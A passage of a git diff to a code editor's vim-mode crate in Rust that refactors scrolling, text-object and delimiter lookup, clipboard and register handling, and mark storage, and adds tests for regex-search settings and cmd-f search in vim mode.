as f32) + } else { + ScrollAmount::Line((amount.lines(visible_line_count) - 1.0) as f32) + } + } + _ => amount, + }; + + editor.scroll_screen(&amount, window, cx); + if !should_move_cursor { + return; } - } - _ => amount, - }; - editor.scroll_screen(&amount, window, cx); - if !should_move_cursor { - return; - } + let Some(visible_line_count) = editor.visible_line_count() else { + return; + }; - let Some(visible_line_count) = editor.visible_line_count() else { - return; - }; + let Some(visible_column_count) = editor.visible_column_count() else { + return; + }; - let Some(visible_column_count) = editor.visible_column_count() else { - return; - }; + let display_snapshot = editor.display_map.update(cx, |map, cx| map.snapshot(cx)); + let top = editor + .scroll_manager + .scroll_top_display_point(&display_snapshot, cx); + let vertical_scroll_margin = EditorSettings::get_global(cx).vertical_scroll_margin; - let display_snapshot = editor.display_map.update(cx, |map, cx| map.snapshot(cx)); - let top = editor - .scroll_manager - .scroll_top_display_point(&display_snapshot, cx); - let vertical_scroll_margin = EditorSettings::get_global(cx).vertical_scroll_margin; - - editor.change_selections( - SelectionEffects::no_scroll().nav_history(false), - window, - cx, - |s| { - s.move_with(&mut |map, selection| { + let mut move_cursor = |map: &editor::display_map::DisplaySnapshot, + mut head: DisplayPoint, + goal: SelectionGoal| { // TODO: Improve the logic and function calls below to be dependent on // the `amount`. If the amount is vertical, we don't care about // columns, while if it's horizontal, we don't care about rows, // so we don't need to calculate both and deal with logic for // both. - let mut head = selection.head(); let max_point = map.max_point(); let starting_column = head.column(); @@ -171,17 +163,18 @@ fn scroll_editor( (vertical_scroll_margin as u32).min(visible_line_count as u32 / 2); if preserve_cursor_position { - let new_row = if old_top.row() == top.row() { - DisplayRow( - head.row() - .0 - .saturating_add_signed(amount.lines(visible_line_count) as i32), - ) - } else { - DisplayRow(top.row().0.saturating_add_signed( - selection.head().row().0 as i32 - old_top.row().0 as i32, - )) - }; + let new_row = + if old_top.row() == top.row() { + DisplayRow( + head.row() + .0 + .saturating_add_signed(amount.lines(visible_line_count) as i32), + ) + } else { + DisplayRow(top.row().0.saturating_add_signed( + head.row().0 as i32 - old_top.row().0 as i32, + )) + }; head = map.clip_point(DisplayPoint::new(new_row, head.column()), Bias::Left) } @@ -259,17 +252,36 @@ fn scroll_editor( let new_head = map.clip_point(DisplayPoint::new(new_row, new_column), Bias::Left); let goal = match amount { ScrollAmount::Column(_) | ScrollAmount::PageWidth(_) => SelectionGoal::None, - _ => selection.goal, + _ => goal, }; - if selection.is_empty() || !mode.is_visual() { - selection.collapse_to(new_head, goal) - } else { - selection.set_head(new_head, goal) - }; - }) - }, - ); + Some((new_head, goal)) + }; + + if vim.mode == Mode::VisualBlock { + vim.visual_block_motion(true, editor, window, cx, &mut move_cursor); + } else { + editor.change_selections( + SelectionEffects::no_scroll().nav_history(false), + window, + cx, + |s| { + s.move_with(&mut |map, selection| { + if let Some((new_head, goal)) = + move_cursor(map, selection.head(), selection.goal) + { + if selection.is_empty() || !vim.mode.is_visual() { + selection.collapse_to(new_head, goal) + } else { + selection.set_head(new_head, goal) + } + } + }) + }, + ); + } + }); + } } #[cfg(test)] diff --git a/crates/vim/src/normal/search.rs b/crates/vim/src/normal/search.rs index 248f43c08192182cb266dbfc43a5a769f87429cd..22c453c877ec89fdbf432d19d89167285b78b12f 100644 --- a/crates/vim/src/normal/search.rs +++ b/crates/vim/src/normal/search.rs @@ -245,7 +245,7 @@ impl Vim { search_bar.set_replacement(None, cx); let mut options = SearchOptions::NONE; - if action.regex { + if action.regex && VimSettings::get_global(cx).use_regex_search { options |= SearchOptions::REGEX; } if action.backwards { @@ -284,6 +284,7 @@ impl Vim { self.search = SearchState { direction, count, + cmd_f_search: false, prior_selections, prior_operator: self.operator_stack.last().cloned(), prior_mode, @@ -298,6 +299,7 @@ impl Vim { let current_mode = self.mode; self.search = Default::default(); self.search.prior_mode = current_mode; + self.search.cmd_f_search = true; cx.propagate(); } @@ -957,6 +959,45 @@ mod test { cx.assert_editor_state("«oneˇ» one one one"); } + #[gpui::test] + async fn test_non_vim_search_in_vim_mode(cx: &mut gpui::TestAppContext) { + let mut cx = VimTestContext::new(cx, true).await; + cx.cx.set_state("ˇone one one one"); + cx.run_until_parked(); + cx.simulate_keystrokes("cmd-f"); + cx.run_until_parked(); + + cx.assert_state("«oneˇ» one one one", Mode::Visual); + cx.simulate_keystrokes("enter"); + cx.run_until_parked(); + cx.assert_state("one «oneˇ» one one", Mode::Visual); + cx.simulate_keystrokes("shift-enter"); + cx.run_until_parked(); + cx.assert_state("«oneˇ» one one one", Mode::Visual); + + cx.simulate_keystrokes("escape"); + cx.run_until_parked(); + cx.assert_state("«oneˇ» one one one", Mode::Visual); + } + + #[gpui::test] + async fn test_non_vim_search_in_vim_insert_mode(cx: &mut gpui::TestAppContext) { + let mut cx = VimTestContext::new(cx, true).await; + cx.set_state("ˇone one one one", Mode::Insert); + cx.run_until_parked(); + cx.simulate_keystrokes("cmd-f"); + cx.run_until_parked(); + + cx.assert_state("«oneˇ» one one one", Mode::Insert); + cx.simulate_keystrokes("enter"); + cx.run_until_parked(); + cx.assert_state("one «oneˇ» one one", Mode::Insert); + + cx.simulate_keystrokes("escape"); + cx.run_until_parked(); + cx.assert_state("one «oneˇ» one one", Mode::Insert); + } + #[gpui::test] async fn test_visual_star_hash(cx: &mut gpui::TestAppContext) { let mut cx = NeovimBackedTestContext::new(cx).await; @@ -1405,4 +1446,66 @@ mod test { // The cursor should be at the match location on line 3 (row 2). cx.assert_state("hello world\nfoo bar\nhello ˇagain\n", Mode::Normal); } + + #[gpui::test] + async fn test_vim_search_respects_search_settings(cx: &mut gpui::TestAppContext) { + let mut cx = VimTestContext::new(cx, true).await; + + cx.update_global(|store: &mut SettingsStore, cx| { + store.update_user_settings(cx, |settings| { + settings.vim.get_or_insert_default().use_regex_search = Some(false); + }); + }); + + cx.set_state("ˇcontent", Mode::Normal); + cx.simulate_keystrokes("/"); + cx.run_until_parked(); + + // Verify search options are set from settings + let search_bar = cx.workspace(|workspace, _, cx| { + workspace + .active_pane() + .read(cx) + .toolbar() + .read(cx) + .item_of_type::() + .expect("Buffer search bar should be active") + }); + + cx.update_entity(search_bar, |bar, _window, _cx| { + assert!( + !bar.has_search_option(search::SearchOptions::REGEX), + "Vim search open without regex mode" + ); + }); + + cx.simulate_keystrokes("escape"); + cx.run_until_parked(); + + cx.update_global(|store: &mut SettingsStore, cx| { + store.update_user_settings(cx, |settings| { + settings.vim.get_or_insert_default().use_regex_search = Some(true); + }); + }); + + cx.simulate_keystrokes("/"); + cx.run_until_parked(); + + let search_bar = cx.workspace(|workspace, _, cx| { + workspace + .active_pane() + .read(cx) + .toolbar() + .read(cx) + .item_of_type::() + .expect("Buffer search bar should be active") + }); + + cx.update_entity(search_bar, |bar, _window, _cx| { + assert!( + bar.has_search_option(search::SearchOptions::REGEX), + "Vim search opens with regex mode" + ); + }); + } } diff --git a/crates/vim/src/object.rs b/crates/vim/src/object.rs index 1c96ba74b455c5d94e53a0ab9c78cd3ae8af5b3c..67b4b16b178e75316eb10b051ab9153737777e3f 100644 --- a/crates/vim/src/object.rs +++ b/crates/vim/src/object.rs @@ -203,33 +203,24 @@ fn find_mini_delimiters( is_valid_delimiter: &DelimiterPredicate, ) -> Option> { let point = map.clip_at_line_end(display_point).to_point(map); - let offset = point.to_offset(&map.buffer_snapshot()); + let offset = map.buffer_snapshot().point_to_offset(point); let line_range = get_line_range(map, point); let visible_line_range = get_visible_line_range(&line_range); let snapshot = &map.buffer_snapshot(); - let mut excerpt = snapshot.excerpt_containing(offset..offset)?; - let buffer = excerpt.buffer(); - let buffer_offset = excerpt.map_offset_to_buffer(offset); - let bracket_filter = |open: Range, close: Range| { - is_valid_delimiter(buffer, open.start, close.start) - }; - - // Try to find delimiters in visible range first let ranges = map .buffer_snapshot() .bracket_ranges(visible_line_range) .map(|ranges| { ranges.filter_map(|(open, close)| { - // Convert the ranges from multibuffer space to buffer space as - // that is what `is_valid_delimiter` expects, otherwise it might - // panic as the values might be out of bounds. - let buffer_open = excerpt.map_range_to_buffer(open.clone()); - let buffer_close = excerpt.map_range_to_buffer(close.clone()); + let (buffer, buffer_open) = + snapshot.range_to_buffer_range::(open.clone())?; + let (_, buffer_close) = + snapshot.range_to_buffer_range::(close.clone())?; - if is_valid_delimiter(buffer, buffer_open.start.0, buffer_close.start.0) { + if is_valid_delimiter(buffer, buffer_open.start, buffer_close.start) { Some((open, close)) } else { None @@ -247,18 +238,31 @@ fn find_mini_delimiters( ); } - // Fall back to innermost enclosing brackets - let (open_bracket, close_bracket) = buffer - .innermost_enclosing_bracket_ranges(buffer_offset..buffer_offset, Some(&bracket_filter))?; + let results = snapshot.map_excerpt_ranges(offset..offset, |buffer, _, input_range| { + let buffer_offset = input_range.start.0; + let bracket_filter = |open: Range, close: Range| { + is_valid_delimiter(buffer, open.start, close.start) + }; + let Some((open, close)) = buffer.innermost_enclosing_bracket_ranges( + buffer_offset..buffer_offset, + Some(&bracket_filter), + ) else { + return vec![]; + }; + vec![ + (BufferOffset(open.start)..BufferOffset(open.end), ()), + (BufferOffset(close.start)..BufferOffset(close.end), ()), + ] + })?; + + if results.len() < 2 { + return None; + } Some( DelimiterRange { - open: excerpt.map_range_from_buffer( - BufferOffset(open_bracket.start)..BufferOffset(open_bracket.end), - ), - close: excerpt.map_range_from_buffer( - BufferOffset(close_bracket.start)..BufferOffset(close_bracket.end), - ), + open: results[0].0.clone(), + close: results[1].0.clone(), } .to_display_range(map, around), ) @@ -935,61 +939,64 @@ pub fn surrounding_html_tag( } let snapshot = &map.buffer_snapshot(); - let offset = head.to_offset(map, Bias::Left); - let mut excerpt = snapshot.excerpt_containing(offset..offset)?; - let buffer = excerpt.buffer(); - let offset = excerpt.map_offset_to_buffer(offset); - - // Find the most closest to current offset - let mut cursor = buffer.syntax_layer_at(offset)?.node().walk(); - let mut last_child_node = cursor.node(); - while cursor.goto_first_child_for_byte(offset.0).is_some() { - last_child_node = cursor.node(); - } - - let mut last_child_node = Some(last_child_node); - while let Some(cur_node) = last_child_node { - if cur_node.child_count() >= 2 { - let first_child = cur_node.child(0); - let last_child = cur_node.child(cur_node.child_count() as u32 - 1); - if let (Some(first_child), Some(last_child)) = (first_child, last_child) { - let open_tag = open_tag(buffer.chars_for_range(first_child.byte_range())); - let close_tag = close_tag(buffer.chars_for_range(last_child.byte_range())); - // It needs to be handled differently according to the selection length - let is_valid = if range.end.to_offset(map, Bias::Left) - - range.start.to_offset(map, Bias::Left) - <= 1 - { - offset.0 <= last_child.end_byte() - } else { - excerpt - .map_offset_to_buffer(range.start.to_offset(map, Bias::Left)) - .0 - >= first_child.start_byte() - && excerpt - .map_offset_to_buffer(range.end.to_offset(map, Bias::Left)) - .0 - <= last_child.start_byte() + 1 - }; - if open_tag.is_some() && open_tag == close_tag && is_valid { - let range = if around { - first_child.byte_range().start..last_child.byte_range().end - } else { - first_child.byte_range().end..last_child.byte_range().start - }; - let range = BufferOffset(range.start)..BufferOffset(range.end); - if excerpt.contains_buffer_range(range.clone()) { - let result = excerpt.map_range_from_buffer(range); - return Some( - result.start.to_display_point(map)..result.end.to_display_point(map), - ); + let head_offset = head.to_offset(map, Bias::Left); + let range_start = range.start.to_offset(map, Bias::Left); + let range_end = range.end.to_offset(map, Bias::Left); + let head_is_start = head_offset <= range_start; + + let results = snapshot.map_excerpt_ranges( + range_start..range_end, + |buffer, _excerpt_range, input_buffer_range| { + let buffer_offset = if head_is_start { + input_buffer_range.start + } else { + input_buffer_range.end + }; + + let Some(layer) = buffer.syntax_layer_at(buffer_offset) else { + return Vec::new(); + }; + let mut cursor = layer.node().walk(); + let mut last_child_node = cursor.node(); + while cursor.goto_first_child_for_byte(buffer_offset.0).is_some() { + last_child_node = cursor.node(); + } + + let mut last_child_node = Some(last_child_node); + while let Some(cur_node) = last_child_node { + if cur_node.child_count() >= 2 { + let first_child = cur_node.child(0); + let last_child = cur_node.child(cur_node.child_count() as u32 - 1); + if let (Some(first_child), Some(last_child)) = (first_child, last_child) { + let open_tag = open_tag(buffer.chars_for_range(first_child.byte_range())); + let close_tag = close_tag(buffer.chars_for_range(last_child.byte_range())); + let is_valid = if range_end.saturating_sub(range_start) <= 1 { + buffer_offset.0 <= last_child.end_byte() + } else { + input_buffer_range.start.0 >= first_child.start_byte() + && input_buffer_range.end.0 <= last_child.start_byte() + 1 + }; + if open_tag.is_some() && open_tag == close_tag && is_valid { + let buffer_range = if around { + first_child.byte_range().start..last_child.byte_range().end + } else { + first_child.byte_range().end..last_child.byte_range().start + }; + return vec![( + BufferOffset(buffer_range.start)..BufferOffset(buffer_range.end), + (), + )]; + } } } + last_child_node = cur_node.parent(); } - } - last_child_node = cur_node.parent(); - } - None + Vec::new() + }, + )?; + + let (result, ()) = results.into_iter().next()?; + Some(result.start.to_display_point(map)..result.end.to_display_point(map)) } /// Returns a range that surrounds the word and following whitespace @@ -1163,44 +1170,55 @@ fn text_object( let snapshot = &map.buffer_snapshot(); let offset = relative_to.to_offset(map, Bias::Left); - let mut excerpt = snapshot.excerpt_containing(offset..offset)?; - let buffer = excerpt.buffer(); - let offset = excerpt.map_offset_to_buffer(offset); - - let mut matches: Vec> = buffer - .text_object_ranges(offset..offset, TreeSitterOptions::default()) - .filter_map(|(r, m)| if m == target { Some(r) } else { None }) - .collect(); - matches.sort_by_key(|r| r.end - r.start); - if let Some(buffer_range) = matches.first() { - let buffer_range = BufferOffset(buffer_range.start)..BufferOffset(buffer_range.end); - let range = excerpt.map_range_from_buffer(buffer_range); - return Some(range.start.to_display_point(map)..range.end.to_display_point(map)); - } - - let around = target.around()?; - let mut matches: Vec> = buffer - .text_object_ranges(offset..offset, TreeSitterOptions::default()) - .filter_map(|(r, m)| if m == around { Some(r) } else { None }) - .collect(); - matches.sort_by_key(|r| r.end - r.start); - let around_range = matches.first()?; - - let mut matches: Vec> = buffer - .text_object_ranges(around_range.clone(), TreeSitterOptions::default()) - .filter_map(|(r, m)| if m == target { Some(r) } else { None }) - .collect(); - matches.sort_by_key(|r| r.start); - if let Some(buffer_range) = matches.first() - && !buffer_range.is_empty() - { - let buffer_range = BufferOffset(buffer_range.start)..BufferOffset(buffer_range.end); - let range = excerpt.map_range_from_buffer(buffer_range); - return Some(range.start.to_display_point(map)..range.end.to_display_point(map)); - } - let around_range = BufferOffset(around_range.start)..BufferOffset(around_range.end); - let buffer_range = excerpt.map_range_from_buffer(around_range); - return Some(buffer_range.start.to_display_point(map)..buffer_range.end.to_display_point(map)); + let results = + snapshot.map_excerpt_ranges(offset..offset, |buffer, _excerpt_range, buffer_range| { + let buffer_offset = buffer_range.start; + + let mut matches: Vec> = buffer + .text_object_ranges(buffer_offset..buffer_offset, TreeSitterOptions::default()) + .filter_map(|(r, m)| if m == target { Some(r) } else { None }) + .collect(); + matches.sort_by_key(|r| r.end - r.start); + if let Some(buffer_range) = matches.first() { + return vec![( + BufferOffset(buffer_range.start)..BufferOffset(buffer_range.end), + (), + )]; + } + + let Some(around) = target.around() else { + return vec![]; + }; + let mut matches: Vec> = buffer + .text_object_ranges(buffer_offset..buffer_offset, TreeSitterOptions::default()) + .filter_map(|(r, m)| if m == around { Some(r) } else { None }) + .collect(); + matches.sort_by_key(|r| r.end - r.start); + let Some(around_range) = matches.first() else { + return vec![]; + }; + + let mut matches: Vec> = buffer + .text_object_ranges(around_range.clone(), TreeSitterOptions::default()) + .filter_map(|(r, m)| if m == target { Some(r) } else { None }) + .collect(); + matches.sort_by_key(|r| r.start); + if let Some(buffer_range) = matches.first() + && !buffer_range.is_empty() + { + return vec![( + BufferOffset(buffer_range.start)..BufferOffset(buffer_range.end), + (), + )]; + } + vec![( + BufferOffset(around_range.start)..BufferOffset(around_range.end), + (), + )] + })?; + + let (range, ()) = results.into_iter().next()?; + Some(range.start.to_display_point(map)..range.end.to_display_point(map)) } fn argument( @@ -1211,16 +1229,11 @@ fn argument( let snapshot = &map.buffer_snapshot(); let offset = relative_to.to_offset(map, Bias::Left); - // The `argument` vim text object uses the syntax tree, so we operate at the buffer level and map back to the display level - let mut excerpt = snapshot.excerpt_containing(offset..offset)?; - let buffer = excerpt.buffer(); - fn comma_delimited_range_at( buffer: &BufferSnapshot, mut offset: BufferOffset, include_comma: bool, ) -> Option> { - // Seek to the first non-whitespace character offset += buffer .chars_at(offset) .take_while(|c| c.is_whitespace()) @@ -1228,25 +1241,20 @@ fn argument( .sum::(); let bracket_filter = |open: Range, close: Range| { - // Filter out empty ranges if open.end == close.start { return false; } - // If the cursor is outside the brackets, ignore them if open.start == offset.0 || close.end == offset.0 { return false; } - // TODO: Is there any better way to filter out string brackets? - // Used to filter out string brackets matches!( buffer.chars_at(open.start).next(), Some('(' | '[' | '{' | '<' | '|') ) }; - // Find the brackets containing the cursor let (open_bracket, close_bracket) = buffer.innermost_enclosing_bracket_ranges(offset..offset, Some(&bracket_filter))?; @@ -1256,7 +1264,6 @@ fn argument( let node = layer.node(); let mut cursor = node.walk(); - // Loop until we find the smallest node whose parent covers the bracket range. This node is the argument in the parent argument list let mut parent_covers_bracket_range = false; loop { let node = cursor.node(); @@ -1268,20 +1275,17 @@ fn argument( } parent_covers_bracket_range = covers_bracket_range; - // Unable to find a child node with a parent that covers the bracket range, so no argument to select cursor.goto_first_child_for_byte(offset.0)?; } let mut argument_node = cursor.node(); - // If the child node is the open bracket, move to the next sibling. if argument_node.byte_range() == open_bracket { if !cursor.goto_next_sibling() { return Some(inner_bracket_range); } argument_node = cursor.node(); } - // While the child node is the close bracket or a comma, move to the previous sibling while argument_node.byte_range() == close_bracket || argument_node.kind() == "," { if !cursor.goto_previous_sibling() { return Some(inner_bracket_range); @@ -1292,14 +1296,11 @@ fn argument( } } - // The start and end of the argument range, defaulting to the start and end of the argument node let mut start = argument_node.start_byte(); let mut end = argument_node.end_byte(); let mut needs_surrounding_comma = include_comma; - // Seek backwards to find the start of the argument - either the previous comma or the opening bracket. - // We do this because multiple nodes can represent a single argument, such as with rust `vec![a.b.c, d.e.f]` while cursor.goto_previous_sibling() { let prev = cursor.node(); @@ -1317,7 +1318,6 @@ fn argument( } } - // Do the same for the end of the argument, extending to next comma or the end of the argument list while cursor.goto_next_sibling() { let next = cursor.node(); @@ -1326,7 +1326,6 @@ fn argument( break; } else if next.kind() == "," { if needs_surrounding_comma { - // Select up to the beginning of the next argument if there is one, otherwise to the end of the comma if let Some(next_arg) = next.next_sibling() { end = next_arg.start_byte(); } else { @@ -1342,14 +1341,17 @@ fn argument( Some(BufferOffset(start)..BufferOffset(end)) } - let result = comma_delimited_range_at(buffer, excerpt.map_offset_to_buffer(offset), around)?; + let results = + snapshot.map_excerpt_ranges(offset..offset, |buffer, _excerpt_range, buffer_range| { + let buffer_offset = buffer_range.start; + match comma_delimited_range_at(buffer, buffer_offset, around) { + Some(result) => vec![(result, ())], + None => vec![], + } + })?; - if excerpt.contains_buffer_range(result.clone()) { - let result = excerpt.map_range_from_buffer(result); - Some(result.start.to_display_point(map)..result.end.to_display_point(map)) - } else { - None - } + let (range, ()) = results.into_iter().next()?; + Some(range.start.to_display_point(map)..range.end.to_display_point(map)) } fn indent( @@ -3369,7 +3371,12 @@ mod test { // but, since this is being set manually, the language isn't // automatically set. let editor = Editor::new(EditorMode::full(), multi_buffer.clone(), None, window, cx); - let buffer_ids = multi_buffer.read(cx).excerpt_buffer_ids(); + let buffer_ids = multi_buffer + .read(cx) + .snapshot(cx) + .excerpts() + .map(|excerpt| excerpt.context.start.buffer_id) + .collect::>(); if let Some(buffer) = multi_buffer.read(cx).buffer(buffer_ids[1]) { buffer.update(cx, |buffer, cx| { buffer.set_language(Some(language::rust_lang()), cx); diff --git a/crates/vim/src/replace.rs b/crates/vim/src/replace.rs index 49cc4a27ff59eebde2f9ce50e99e08a27e830853..338cf9bfe985654172d690518240879c84e9e2ae 100644 --- a/crates/vim/src/replace.rs +++ b/crates/vim/src/replace.rs @@ -282,12 +282,12 @@ impl Vim { /// Pastes the clipboard contents, replacing the same number of characters /// as the clipboard's contents. pub fn paste_replace(&mut self, window: &mut Window, cx: &mut Context) { - let clipboard_text = - cx.read_from_clipboard() - .and_then(|item| match item.entries().first() { - Some(ClipboardEntry::String(text)) => Some(text.text().to_string()), - _ => None, - }); + let clipboard_text = cx.read_from_clipboard().and_then(|item| { + item.entries().iter().find_map(|entry| match entry { + ClipboardEntry::String(text) => Some(text.text().to_string()), + _ => None, + }) + }); if let Some(text) = clipboard_text { self.push_operator(Operator::Replace, window, cx); diff --git a/crates/vim/src/rewrap.rs b/crates/vim/src/rewrap.rs index 3cb7d66116023d979d83e04a00b974fdd2a6d078..208bbfc7e6b37bb5b3ec2a8f53aaa191d79444bd 100644 --- a/crates/vim/src/rewrap.rs +++ b/crates/vim/src/rewrap.rs @@ -1,19 +1,20 @@ use crate::{Vim, motion::Motion, object::Object, state::Mode}; use collections::HashMap; use editor::{Bias, Editor, RewrapOptions, SelectionEffects, display_map::ToDisplayPoint}; -use gpui::{Context, Window, actions}; +use gpui::{Action, Context, Window}; use language::SelectionGoal; +use schemars::JsonSchema; +use serde::Deserialize; -actions!( - vim, - [ - /// Rewraps the selected text to fit within the line width. - Rewrap - ] -); +/// Rewraps the selected text to fit within the line width. +#[derive(Clone, Deserialize, JsonSchema, PartialEq, Action)] +#[action(namespace = vim)] +pub(crate) struct Rewrap { + pub line_length: Option, +} pub(crate) fn register(editor: &mut Editor, cx: &mut Context) { - Vim::action(editor, cx, |vim, _: &Rewrap, window, cx| { + Vim::action(editor, cx, |vim, action: &Rewrap, window, cx| { vim.record_current_action(cx); Vim::take_count(cx); Vim::take_forced_motion(cx); @@ -24,6 +25,7 @@ pub(crate) fn register(editor: &mut Editor, cx: &mut Context) { editor.rewrap_impl( RewrapOptions { override_language_settings: true, + line_length: action.line_length, ..Default::default() }, cx, diff --git a/crates/vim/src/state.rs b/crates/vim/src/state.rs index 0244a14c83b422a1fed803c761c7e873b42bd267..4dd557199ab9aebe0a2b26438bdaa0e321a956b2 100644 --- a/crates/vim/src/state.rs +++ b/crates/vim/src/state.rs @@ -18,6 +18,7 @@ use gpui::{ EntityId, Global, HighlightStyle, StyledText, Subscription, Task, TextStyle, WeakEntity, }; use language::{Buffer, BufferEvent, BufferId, Chunk, Point}; + use multi_buffer::MultiBufferRow; use picker::{Picker, PickerDelegate}; use project::{Project, ProjectItem, ProjectPath}; @@ -28,7 +29,7 @@ use std::collections::HashSet; use std::path::Path; use std::{fmt::Display, ops::Range, sync::Arc}; use text::{Bias, ToPoint}; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{ ActiveTheme, Context, Div, FluentBuilder, KeyBinding, ParentElement, SharedString, Styled, StyledTypography, Window, h_flex, rems, @@ -73,6 +74,10 @@ impl Mode { Self::Normal | Self::Insert | Self::Replace | Self::HelixNormal => false, } } + + pub fn is_helix(&self) -> bool { + matches!(self, Self::HelixNormal | Self::HelixSelect) + } } #[derive(Clone, Debug, PartialEq)] @@ -187,14 +192,15 @@ impl From for ClipboardItem { impl From for Register { fn from(item: ClipboardItem) -> Self { - // For now, we don't store metadata for multiple entries. - match item.entries().first() { - Some(ClipboardEntry::String(value)) if item.entries().len() == 1 => Register { + match item.entries().iter().find_map(|entry| match entry { + ClipboardEntry::String(value) => Some(value), + _ => None, + }) { + Some(value) => Register { text: value.text().to_owned().into(), clipboard_selections: value.metadata_json::>(), }, - // For now, registers can't store images. This could change in the future. - _ => Register::default(), + None => Register::default(), } } } @@ -228,7 +234,15 @@ pub struct VimGlobals { pub recorded_actions: Vec, pub recorded_selection: RecordedSelection, + /// The register being written to by the active `q{register}` macro + /// recording. pub recording_register: Option, + /// The register that was selected at the start of the current + /// dot-recording, for example, `"ap`. + pub recording_register_for_dot: Option, + /// The register from the last completed dot-recording. Used when replaying + /// with `.`. + pub recorded_register_for_dot: Option, pub last_recorded_register: Option, pub last_replayed_register: Option, pub replayer: Option, @@ -310,10 +324,11 @@ impl MarksState { let Some(workspace_id) = this.update(cx, |this, cx| this.workspace_id(cx)).ok()? else { return None; }; + let db = cx.update(|cx| VimDb::global(cx)); let (marks, paths) = cx .background_spawn(async move { - let marks = DB.get_marks(workspace_id)?; - let paths = DB.get_global_marks_paths(workspace_id)?; + let marks = db.get_marks(workspace_id)?; + let paths = db.get_global_marks_paths(workspace_id)?; anyhow::Ok((marks, paths)) }) .await @@ -411,7 +426,7 @@ impl MarksState { name.clone(), buffer .read(cx) - .summaries_for_anchors::(anchors) + .summaries_for_anchors::(anchors.iter().copied()) .collect(), ) }) @@ -432,8 +447,9 @@ impl MarksState { if let Some(workspace_id) = self.workspace_id(cx) { let path = path.clone(); let key = key.clone(); + let db = VimDb::global(cx); cx.background_spawn(async move { - DB.set_global_mark_path(workspace_id, key, path).await + db.set_global_mark_path(workspace_id, key, path).await }) .detach_and_log_err(cx); } @@ -449,8 +465,9 @@ impl MarksState { self.serialized_marks.insert(path.clone(), new_points); if let Some(workspace_id) = self.workspace_id(cx) { + let db = VimDb::global(cx); cx.background_spawn(async move { - DB.set_marks(workspace_id, path.clone(), to_write).await?; + db.set_marks(workspace_id, path.clone(), to_write).await?; anyhow::Ok(()) }) .detach_and_log_err(cx); @@ -475,7 +492,14 @@ impl MarksState { { let buffer_marks = old_marks .into_iter() - .map(|(k, v)| (k, v.into_iter().map(|anchor| anchor.text_anchor).collect())) + .map(|(k, v)| { + ( + k, + v.into_iter() + .filter_map(|anchor| anchor.raw_text_anchor()) + .collect(), + ) + }) .collect(); self.buffer_marks .insert(buffer.read(cx).remote_id(), buffer_marks); @@ -515,7 +539,7 @@ impl MarksState { cx: &mut Context, ) { let on_change = cx.subscribe(buffer_handle, move |this, buffer, event, cx| match event { - BufferEvent::Edited => { + BufferEvent::Edited { .. } => { if let Some(path) = this.path_for_buffer(&buffer, cx) { this.serialize_buffer_marks(path, &buffer, cx); } @@ -552,6 +576,7 @@ impl MarksState { anchors: Vec, cx: &mut Context, ) { + let multibuffer_snapshot = multibuffer.read(cx).snapshot(cx); let buffer = multibuffer.read(cx).as_singleton(); let abs_path = buffer.as_ref().and_then(|b| self.path_for_buffer(b, cx)); @@ -585,7 +610,7 @@ impl MarksState { name.clone(), anchors .into_iter() - .map(|anchor| anchor.text_anchor) + .filter_map(|anchor| Some(multibuffer_snapshot.anchor_to_buffer_anchor(anchor)?.0)) .collect(), ); if !self.watched_buffers.contains_key(&buffer_id) { @@ -612,12 +637,13 @@ impl MarksState { return Some(Mark::Local(anchors.get(name)?.clone())); } - let (excerpt_id, buffer_id, _) = multi_buffer.read(cx).read(cx).as_singleton()?; - if let Some(anchors) = self.buffer_marks.get(&buffer_id) { + let multibuffer_snapshot = multi_buffer.read(cx).snapshot(cx); + let buffer_snapshot = multibuffer_snapshot.as_singleton()?; + if let Some(anchors) = self.buffer_marks.get(&buffer_snapshot.remote_id()) { let text_anchors = anchors.get(name)?; let anchors = text_anchors .iter() - .map(|anchor| Anchor::in_buffer(excerpt_id, *anchor)) + .filter_map(|anchor| multibuffer_snapshot.anchor_in_excerpt(*anchor)) .collect(); return Some(Mark::Local(anchors)); } @@ -643,8 +669,9 @@ impl MarksState { let path = if let Some(target) = self.global_marks.get(&mark_name.clone()) { let name = mark_name.clone(); if let Some(workspace_id) = self.workspace_id(cx) { + let db = VimDb::global(cx); cx.background_spawn(async move { - DB.delete_global_marks_path(workspace_id, name).await + db.delete_global_marks_path(workspace_id, name).await }) .detach_and_log_err(cx); } @@ -684,7 +711,8 @@ impl MarksState { .get_mut(&path) .map(|m| m.remove(&mark_name.clone())); if let Some(workspace_id) = self.workspace_id(cx) { - cx.background_spawn(async move { DB.delete_mark(workspace_id, path, mark_name).await }) + let db = VimDb::global(cx); + cx.background_spawn(async move { db.delete_mark(workspace_id, path, mark_name).await }) .detach_and_log_err(cx); } } @@ -876,14 +904,13 @@ impl VimGlobals { } } '%' => editor.and_then(|editor| { - let selection = editor - .selections - .newest::(&editor.display_snapshot(cx)); - if let Some((_, buffer, _)) = editor - .buffer() - .read(cx) - .excerpt_containing(selection.head(), cx) - { + let multibuffer = editor.buffer().read(cx); + let snapshot = multibuffer.snapshot(cx); + let selection = editor.selections.newest_anchor(); + let buffer = snapshot + .anchor_to_buffer_anchor(selection.head()) + .and_then(|(text_anchor, _)| multibuffer.buffer(text_anchor.buffer_id)); + if let Some(buffer) = buffer { buffer .read(cx) .file() @@ -915,6 +942,7 @@ impl VimGlobals { self.dot_recording = false; self.recorded_actions = std::mem::take(&mut self.recording_actions); self.recorded_count = self.recording_count.take(); + self.recorded_register_for_dot = self.recording_register_for_dot.take(); self.stop_recording_after_next_action = false; } } @@ -942,6 +970,7 @@ impl VimGlobals { self.dot_recording = false; self.recorded_actions = std::mem::take(&mut self.recording_actions); self.recorded_count = self.recording_count.take(); + self.recorded_register_for_dot = self.recording_register_for_dot.take(); self.stop_recording_after_next_action = false; } } @@ -1001,6 +1030,7 @@ impl Clone for ReplayableAction { pub struct SearchState { pub direction: Direction, pub count: usize, + pub cmd_f_search: bool, pub prior_selections: Vec>, pub prior_operator: Option, @@ -1382,8 +1412,8 @@ impl MarksMatchInfo { let mut offset = 0; for chunk in chunks { line.push_str(chunk.text); - if let Some(highlight_style) = chunk.syntax_highlight_id - && let Some(highlight) = highlight_style.style(cx.theme().syntax()) + if let Some(highlight_id) = chunk.syntax_highlight_id + && let Some(highlight) = cx.theme().syntax().get(highlight_id).cloned() { highlights.push((offset..offset + chunk.text.len(), highlight)) } @@ -1750,7 +1780,7 @@ impl Domain for VimDb { ]; } -db::static_connection!(DB, VimDb, [WorkspaceDb]); +db::static_connection!(VimDb, [WorkspaceDb]); struct SerializedMark { path: Arc, diff --git a/crates/vim/src/test.rs b/crates/vim/src/test.rs index 